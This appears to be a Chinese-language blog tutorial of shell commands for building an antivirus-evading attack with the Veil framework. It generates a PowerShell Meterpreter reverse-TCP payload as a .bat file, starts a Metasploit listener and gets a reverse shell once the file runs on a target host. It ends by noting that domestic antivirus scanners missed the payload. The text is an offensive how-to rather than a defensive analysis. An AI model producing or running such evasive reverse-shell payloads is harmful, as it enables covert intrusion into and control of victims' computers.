首先安装
┌─[root@sch01ar]─[~] └──╼ #cd /sch01ar/Veil/
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #cd setup/
┌─[root@sch01ar]─[/sch01ar/Veil/setup] └──╼ #./setup.sh -c
在安装过程中,可能会有一处需要输入msf地址的
安装完成
如果veil在运行的时候有什么错误,可以使用命令删除再运行
┌─[root@sch01ar]─[~] └──╼ #rm -rf /root/.config/wine/veil
┌─[root@sch01ar]─[~] └──╼ #/sch01ar/Veil/setup/setup.sh -c
给Veil权限并打开文件夹
┌─[root@sch01ar]─[/sch01ar] └──╼ #chmod +x Veil/
┌─[root@sch01ar]─[/sch01ar] └──╼ #cd Veil/
如果用python命令打开则会报错
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #python Veil.py
打开veil
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #./Veil.py
输入list查看工具列表
可以直接回车
选择1
回车
输入list查看payload列表
选择22,回车
Veil-Evasion command: use 22
设置LHOST
[powershell/meterpreter/rev_tcp>>] set LHOST 192.168.220.134
生成
[powershell/meterpreter/rev_tcp>>] generate
输入文件名称
回车
生成了一个bat文件和msf模块
bat文件目录为
/usr/share/veil-output/source/sch01ar.bat
msf模块地址
/usr/share/veil-output/handlers/sch01ar.rc
开启msf监听
┌─[root@sch01ar]─[~] └──╼ #msfconsole -r /usr/share/veil-output/handlers/sch01ar.rc
在目标主机运行bat文件,攻击主机得到反弹的目标主机
输入sessions查看会话
病毒扫描结果
国内的杀软都没有检测出来